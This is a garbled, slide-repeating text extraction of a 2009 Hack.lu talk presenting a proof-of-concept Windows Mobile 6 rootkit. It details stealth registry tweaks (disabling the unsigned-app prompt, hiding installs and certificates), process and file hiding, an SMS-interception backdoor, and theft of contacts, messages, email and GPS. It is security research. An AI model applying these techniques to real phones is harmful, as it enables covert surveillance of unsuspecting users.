Upload
chepimanca
View
219
Download
0
Embed Size (px)
Citation preview
8/9/2019 2009 Hack.lu Slides WM6 Rootkit
1/59
When E.T. comes into Windows Mobile 6a.k.a. PoC(k)ET
Cedric HalbronnSogeti / ESEC R&D
cedric(at)security-labs.org
Hack.lu 2009
http://goforward/http://find/http://goback/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
2/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtectionBackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 2/35
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
3/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Context
Who am I?Security researcher working at Sogeti ESEC R&D labFocusing on mobile security
A smartphone?
Mobile phone - smartphoneVarious services
PDA, Web, camera, GPS, microphone, etc.Current OS :
Symbian, RIM OS, Windows Mobile 6, iPhone OS, Android
Studies on mobile phones rootkits capabilities still limited
C. Halbronn When E.T. comes into Windows Mobile 6 3/35
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
4/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Context
Who am I?Security researcher working at Sogeti ESEC R&D labFocusing on mobile security
A smartphone?
Mobile phone - smartphoneVarious services
PDA, Web, camera, GPS, microphone, etc.Current OS :
Symbian, RIM OS, Windows Mobile 6, iPhone OS, Android
Studies on mobile phones rootkits capabilities still limited
C. Halbronn When E.T. comes into Windows Mobile 6 3/35
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
5/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Objectives
TODO listDevelop a rootkit for WM6
What is a rootkit?
Post-exploitationComponents:
InjectionProtectionBackdoorServices
Taking into account...Embedded constraints / mobile environment
Services on the tableC. Halbronn When E.T. comes into Windows Mobile 6 4/35
C / Obj i
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
6/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Objectives
TODO listDevelop a rootkit for WM6
What is a rootkit?
Post-exploitationComponents:
InjectionProtectionBackdoorServices
Taking into account...Embedded constraints / mobile environment
Services on the tableC. Halbronn When E.T. comes into Windows Mobile 6 4/35
C t t / Obj ti
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
7/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Objectives
TODO listDevelop a rootkit for WM6
What is a rootkit?
Post-exploitationComponents:
InjectionProtectionBackdoorServices
Taking into account...Embedded constraints / mobile environment
Services on the tableC. Halbronn When E.T. comes into Windows Mobile 6 4/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
8/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtectionBackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 5/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
9/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Virtual Memory Address Space
Global Virtual Memory Address Space (4GB)
C. Halbronn When E.T. comes into Windows Mobile 6 6/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
10/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Loading DLLs
Loading DLLs under Windows Mobile 6
C. Halbronn When E.T. comes into Windows Mobile 6 7/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
11/59
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
Security policies
Where?Registry: [HKLM \ Security \ Policies \ Policies]
Some examplesPolicy ID DescriptionAuto Run Policy 2 0 (allowed to run automatically), 1 (restricted)Unsigned Applications Policy 1006 1 (allowed to run), 0 (not allowed to run)Unsigned Prompt Policy 101A 0 (user will be prompted), 1 (user will not be prompted)Password Required Policy 1023 0 (a password is required), any other (a password is not required)
C. Halbronn When E.T. comes into Windows Mobile 6 8/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
12/59
jTechnical aspects of WM6
ImplementationDemo
Conclusion
Security policies
Where?Registry: [HKLM \ Security \ Policies \ Policies]
Some examplesPolicy ID DescriptionAuto Run Policy 2 0 (allowed to run automatically), 1 (restricted)Unsigned Applications Policy 1006 1 (allowed to run), 0 (not allowed to run)Unsigned Prompt Policy 101A 0 (user will be prompted), 1 (user will not be prompted)Password Required Policy 1023 0 (a password is required), any other (a password is not required)
C. Halbronn When E.T. comes into Windows Mobile 6 8/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
13/59
jTechnical aspects of WM6
ImplementationDemo
Conclusion
Application signing
Stores for code executionPrivileged store: privileged execution trust authoritiesUnprivileged store: unprivileged execution trust authorities
SPC (Software Publisher Certicates) store: trust authoritiesfor CAB installation- sign DLLs, EXEs or CABs and put certicate in right store
Stores for SSL chain validation, NOTHING to do with codeexecution
MY: end-user personal certicatesCA: intermediary certication authorities certicatesROOT: root (self-signed) certicates
C. Halbronn When E.T. comes into Windows Mobile 6 9/35
Context / Objectives
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
14/59
jTechnical aspects of WM6
ImplementationDemo
Conclusion
Application signing
Stores for code executionPrivileged store: privileged execution trust authoritiesUnprivileged store: unprivileged execution trust authorities
SPC (Software Publisher Certicates) store: trust authoritiesfor CAB installation- sign DLLs, EXEs or CABs and put certicate in right store
Stores for SSL chain validation, NOTHING to do with codeexecution
MY: end-user personal certicatesCA: intermediary certication authorities certicatesROOT: root (self-signed) certicates
C. Halbronn When E.T. comes into Windows Mobile 6 9/35
Context / Objectivesh l f
General architecture
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
15/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtectionBackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 10/35
Context / ObjectivesT h i l t f WM6
General architectureI j ti
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
16/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
Plan
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtection
BackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 11/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
17/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
Technical choices
ArchitectureHide its presence from phones user
Expatriate information
Technical choices
32-process limit - Single .EXE multi-threads
DLLs impact-
limit their sizeBattery usage - limit actions when neededHeterogeneous environment
C. Halbronn When E.T. comes into Windows Mobile 6 12/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
18/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
Technical choices
ArchitectureHide its presence from phones user
Expatriate information
Technical choices
32-process limit - Single .EXE multi-threads
DLLs impact-
limit their sizeBattery usage - limit actions when neededHeterogeneous environment
C. Halbronn When E.T. comes into Windows Mobile 6 12/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
19/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
Architecture
Rootkit general architectureC. Halbronn When E.T. comes into Windows Mobile 6 13/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
20/59
Technical aspects of WM6Implementation
DemoConclusion
InjectionProtectionBackdoorServices
Plan
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtection
BackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 14/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
21/59
ec ca aspects o W 6Implementation
DemoConclusion
ject oProtectionBackdoorServices
Rootkit injection
Injection methodsSmartphone accessVulnerability exploit-
Ex: MMS handler in WM2003WAP Push messageWeb link- Ex: Etisalat operator in the UnitedArab Emirates (UAE) for Blackberries
OTA provisioning
Our contextSmartphone accessUnsigned CAB - Pop-up
Pop-up
C. Halbronn When E.T. comes into Windows Mobile 6 15/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
22/59
pImplementation
DemoConclusion
jProtectionBackdoorServices
Rootkit injection
Injection methodsSmartphone accessVulnerability exploit- Ex: MMS handler in WM2003WAP Push message
Web link- Ex: Etisalat operator in the UnitedArab Emirates (UAE) for Blackberries
OTA provisioning
Our contextSmartphone accessUnsigned CAB - Pop-up
Pop-up
C. Halbronn When E.T. comes into Windows Mobile 6 15/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
23/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Plan
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtection
BackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 16/35
Context / ObjectivesTechnical aspects of WM6
General architectureInjection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
24/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Automatic startup for an application
Auto-start methods[HKLM \ Init]
\ Windows \ Startup Create a service- DLL loaded byServices.exe
Our choice\ Windows \ Startup
C. Halbronn When E.T. comes into Windows Mobile 6 17/35
Context / ObjectivesTechnical aspects of WM6
I l i
General architectureInjectionP i
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
25/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Automatic startup for an application
Auto-start methods[HKLM \ Init]
\ Windows \ Startup Create a service- DLL loaded byServices.exe
Our choice\ Windows \ Startup
C. Halbronn When E.T. comes into Windows Mobile 6 17/35
Context / ObjectivesTechnical aspects of WM6
I l t ti
General architectureInjectionP t ti
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
26/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Hide unsigned apps (1/2)
By defaultNecessary so we do NOT alert the phone user
First attemptDisable the unsigned prompt policy[HKLM \ Security \ Policies \ Policies] 0000101a=dword:1
ResultNot good, because all external unsigned applications will runwithout alerting the user
C. Halbronn When E.T. comes into Windows Mobile 6 18/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
27/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Hide unsigned apps (1/2)
By defaultNecessary so we do NOT alert the phone user
First attemptDisable the unsigned prompt policy[HKLM \ Security \ Policies \ Policies] 0000101a=dword:1
ResultNot good, because all external unsigned applications will runwithout alerting the user
C. Halbronn When E.T. comes into Windows Mobile 6 18/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
28/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Hide unsigned apps (1/2)
By defaultNecessary so we do NOT alert the phone user
First attemptDisable the unsigned prompt policy[HKLM \ Security \ Policies \ Policies] 0000101a=dword:1
ResultNot good, because all external unsigned applications will runwithout alerting the user
C. Halbronn When E.T. comes into Windows Mobile 6 18/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
29/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Hide unsigned apps (2/2)
Second attemptBetter to have our own certicateWe can sign our binaries and put
our certicate in Privileged store
Visible stores on the deviceMY, CA, ROOTOther stores are NOT visible
ResultOur own certicate will not be visibleon the device
Visible certicate stores
C. Halbronn When E.T. comes into Windows Mobile 6 19/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
30/59
ImplementationDemo
Conclusion
ProtectionBackdoorServices
Hide unsigned apps (2/2)
Second attemptBetter to have our own certicateWe can sign our binaries and put
our certicate in Privileged store
Visible stores on the deviceMY, CA, ROOTOther stores are NOT visible
ResultOur own certicate will not be visibleon the device
Visible certicate stores
C. Halbronn When E.T. comes into Windows Mobile 6 19/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
31/59
pDemo
ConclusionBackdoorServices
Hide unsigned apps (2/2)
Second attemptBetter to have our own certicateWe can sign our binaries and put
our certicate in Privileged store
Visible stores on the deviceMY, CA, ROOTOther stores are NOT visible
ResultOur own certicate will not be visibleon the device
Visible certicate stores
C. Halbronn When E.T. comes into Windows Mobile 6 19/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
32/59
pDemo
ConclusionBackdoorServices
Hide processes (1/2)
First attemptBy default, not needed. Task Manager does NOT show themApparently, it does not show processes that do not have avisible window.
WM6 TaskManager TaskM anagerCE by K. Varma (c)
C. Halbronn When E.T. comes into Windows Mobile 6 20/35
Context / ObjectivesTechnical aspects of WM6Implementation
General architectureInjectionProtection
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
33/59
DemoConclusion
BackdoorServices
Hide processes (2/2)
Second attemptFor better results, possible to hide them a little bit more.Using method from Petr Matousek (2007).
DetailsNo doubly-linked list here32 processes are stored in a PPROCESS table[32];
Function listing the processesBrowses this tableVeries a condition on the process name to consider the slotusedPutting the name to NULL - it is NOT listed
C. Halbronn When E.T. comes into Windows Mobile 6 21/35
Context / ObjectivesTechnical aspects of WM6Implementation
D
General architectureInjectionProtectionB kd
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
34/59
DemoConclusion
BackdoorServices
Hide processes (2/2)
Second attemptFor better results, possible to hide them a little bit more.Using method from Petr Matousek (2007).
DetailsNo doubly-linked list here32 processes are stored in a PPROCESS table[32];Function listing the processes
Browses this tableVeries a condition on the process name to consider the slotusedPutting the name to NULL - it is NOT listed
C. Halbronn When E.T. comes into Windows Mobile 6 21/35
Context / ObjectivesTechnical aspects of WM6Implementation
D
General architectureInjectionProtectionB kd
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
35/59
DemoConclusion
BackdoorServices
Hide les
First attemptAt rst, not needed, who browse les on mobile phones?
Second attemptFor better results, possible to hide them a little bit more.Using method from Petr Matousek (2007).
DetailsInject a DLL into the process handling the le systemfunctionsHook the le listing functions: FindFirstFileW ,FindNextFileW
C. Halbronn When E.T. comes into Windows Mobile 6 22/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
36/59
DemoConclusion
BackdoorServices
Hide les
First attemptAt rst, not needed, who browse les on mobile phones?
Second attemptFor better results, possible to hide them a little bit more.Using method from Petr Matousek (2007).
DetailsInject a DLL into the process handling the le systemfunctionsHook the le listing functions: FindFirstFileW ,FindNextFileW
C. Halbronn When E.T. comes into Windows Mobile 6 22/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
37/59
DemoConclusion
BackdoorServices
Hide les
First attemptAt rst, not needed, who browse les on mobile phones?
Second attemptFor better results, possible to hide them a little bit more.Using method from Petr Matousek (2007).
DetailsInject a DLL into the process handling the le systemfunctionsHook the le listing functions: FindFirstFileW ,FindNextFileW
C. Halbronn When E.T. comes into Windows Mobile 6 22/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
38/59
DemoConclusion
BackdoorServices
Hide CAB installation (1/3)
Add/Remove Programs
CAB installation management[HKLM \ Security \ AppInstall] A key is created in it for the installed app
C. Halbronn When E.T. comes into Windows Mobile 6 23/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
39/59
DemoConclusion
BackdoorServices
Hide CAB installation (1/3)
Add/Remove Programs
CAB installation management[HKLM \ Security \ AppInstall] A key is created in it for the installed app
C. Halbronn When E.T. comes into Windows Mobile 6 23/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
40/59
Conclusion Services
Hide CAB installation (2/3)
First attemptMethod taken from Airscanner Mobile FirewallWhen putting the value Role to 0, it disappear from the list
Airscanner MobileFirewall (c)
C. Halbronn When E.T. comes into Windows Mobile 6 24/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
41/59
Conclusion Services
Hide CAB installation (3/3)
Second attemptIn visual studio, specify theNoUninstalloption in CAB project
ResultDo not create a key in
[HKLM \ Security \ AppInstall] No way to detect it in the registry NoUninstall option
C. Halbronn When E.T. comes into Windows Mobile 6 25/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
42/59
Conclusion Services
Hide CAB installation (3/3)
Second attemptIn visual studio, specify theNoUninstalloption in CAB project
ResultDo not create a key in
[HKLM \ Security \ AppInstall] No way to detect it in the registry NoUninstall option
C. Halbronn When E.T. comes into Windows Mobile 6 25/35
Context / ObjectivesTechnical aspects of WM6Implementation
Demo
General architectureInjectionProtectionBackdoor
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
43/59
Conclusion Services
Plan
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtection
BackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 26/35
Context / ObjectivesTechnical aspects of WM6Implementation
DemoC l i
General architectureInjectionProtectionBackdoorS i
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
44/59
Conclusion Services
TCP/IP communication
Means of communicationData networks: GPRS, Edge, 3GWi-Fi
ActiveSync
How to do it?Phone is behind a NAT- A TCP/IP server on the attackers side
Save battery life
Detect a connection - then, use it.
Communication Manager
C. Halbronn When E.T. comes into Windows Mobile 6 27/35
Context / ObjectivesTechnical aspects of WM6Implementation
DemoC l i
General architectureInjectionProtectionBackdoorS i
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
45/59
Conclusion Services
TCP/IP communication
Means of communicationData networks: GPRS, Edge, 3GWi-Fi
ActiveSync
How to do it?Phone is behind a NAT- A TCP/IP server on the attackers side
Save battery life
Detect a connection - then, use it.
Communication Manager
C. Halbronn When E.T. comes into Windows Mobile 6 27/35
Context / ObjectivesTechnical aspects of WM6Implementation
DemoConclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
46/59
Conclusion Services
TCP/IP communication
Means of communicationData networks: GPRS, Edge, 3GWi-Fi
ActiveSync
How to do it?Phone is behind a NAT- A TCP/IP server on the attackers side
Save battery life
Detect a connection - then, use it.
Communication Manager
C. Halbronn When E.T. comes into Windows Mobile 6 27/35
Context / ObjectivesTechnical aspects of WM6Implementation
DemoConclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
47/59
Conclusion Services
An alternative means?
ProblemHow to control the device when there is no Data connectivity?- Necessary to nd an alternative means of communication
SMS messages
Command SMS - intercepted
Standard COM registration HKEY CLASSES ROOT\ CLSID\ \ InProcServer32@=SMSIntercept.dll
MAPI Inbox HKEY LOCAL MACHINE\ Software \ Microsoft \ Inbox \ Svc \ SMS\ Rules=dword:1
represents the COM objects class ID GUID.
Registry keys dened to intercept SMS messages
Side effectWhen intercepting an SMS, the phone automatically switches on.
C. Halbronn When E.T. comes into Windows Mobile 6 28/35
Context / ObjectivesTechnical aspects of WM6Implementation
DemoConclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
48/59
Conclusion Services
An alternative means?
ProblemHow to control the device when there is no Data connectivity?- Necessary to nd an alternative means of communication
SMS messages
Command SMS - intercepted
Standard COM registration HKEY CLASSES ROOT\ CLSID\ \ InProcServer32@=SMSIntercept.dll
MAPI Inbox HKEY LOCAL MACHINE\ Software \ Microsoft \ Inbox \ Svc \ SMS\ Rules=dword:1
represents the COM objects class ID GUID.
Registry keys dened to intercept SMS messages
Side effectWhen intercepting an SMS, the phone automatically switches on.
C. Halbronn When E.T. comes into Windows Mobile 6 28/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
49/59
Conclusion Services
An alternative means?
ProblemHow to control the device when there is no Data connectivity?- Necessary to nd an alternative means of communication
SMS messages
Command SMS - intercepted
Standard COM registration HKEY CLASSES ROOT\ CLSID\ \ InProcServer32@=SMSIntercept.dll
MAPI Inbox HKEY LOCAL MACHINE\ Software \ Microsoft \ Inbox \ Svc \ SMS\ Rules=dword:1
represents the COM objects class ID GUID.
Registry keys dened to intercept SMS messages
Side effectWhen intercepting an SMS, the phone automatically switches on.
C. Halbronn When E.T. comes into Windows Mobile 6 28/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
50/59
An alternative means?
ProblemHow to control the device when there is no Data connectivity?- Necessary to nd an alternative means of communication
SMS messages
Command SMS - intercepted
Standard COM registration HKEY CLASSES ROOT\ CLSID\ \ InProcServer32@=SMSIntercept.dll
MAPI Inbox HKEY LOCAL MACHINE\ Software \ Microsoft \ Inbox \ Svc \ SMS\ Rules=dword:1
represents the COM objects class ID GUID.
Registry keys dened to intercept SMS messages
Side effectWhen intercepting an SMS, the phone automatically switches on.
C. Halbronn When E.T. comes into Windows Mobile 6 28/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
51/59
Protocol
Communication protocol
C. Halbronn When E.T. comes into Windows Mobile 6 29/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
52/59
Plan
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtectionBackdoorServices
4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 30/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
General architectureInjectionProtectionBackdoorServices
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
53/59
Services
Services on the tableContacts : last name, rst name, mobile phoneSMS : delivery time, sender, contentE-mails : sender, recipients, delivery time, subject, contentGPS : latitude, longitude
Registers to the OSNotication when data are available
C. Halbronn When E.T. comes into Windows Mobile 6 31/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
54/59
1 Context / Objectives
2 Technical aspects of WM6
3 ImplementationGeneral architectureInjectionProtectionBackdoor
Services4 Demo
C. Halbronn When E.T. comes into Windows Mobile 6 32/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
55/59
Demo
C. Halbronn When E.T. comes into Windows Mobile 6 33/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
56/59
Conclusion
ResultsNot detected by AVsOnly detectable if we know where to look for
Limits / enhancementDLLs, registry keys, network connectionsCompression / encryption of communicationsServices : phone-tapping, microphone,
camera...
Attacker point of viewWin32 APIs but embedded constraints
What about the other mobile OS?
AirscannerAntivirus
C. Halbronn When E.T. comes into Windows Mobile 6 34/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
57/59
Conclusion
ResultsNot detected by AVsOnly detectable if we know where to look for
Limits / enhancementDLLs, registry keys, network connectionsCompression / encryption of communicationsServices : phone-tapping, microphone,
camera...
Attacker point of viewWin32 APIs but embedded constraints
What about the other mobile OS?
AirscannerAntivirus
C. Halbronn When E.T. comes into Windows Mobile 6 34/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
58/59
Conclusion
ResultsNot detected by AVsOnly detectable if we know where to look for
Limits / enhancementDLLs, registry keys, network connectionsCompression / encryption of communicationsServices : phone-tapping, microphone,
camera...
Attacker point of viewWin32 APIs but embedded constraints
What about the other mobile OS?
AirscannerAntivirus
C. Halbronn When E.T. comes into Windows Mobile 6 34/35
Context / ObjectivesTechnical aspects of WM6
ImplementationDemo
Conclusion
http://find/http://goback/http://www.esec.fr.sogeti.com/8/9/2019 2009 Hack.lu Slides WM6 Rootkit
59/59
Questions?
Thank you for your attention
C. Halbronn When E.T. comes into Windows Mobile 6 35/35
http://find/http://goback/http://www.esec.fr.sogeti.com/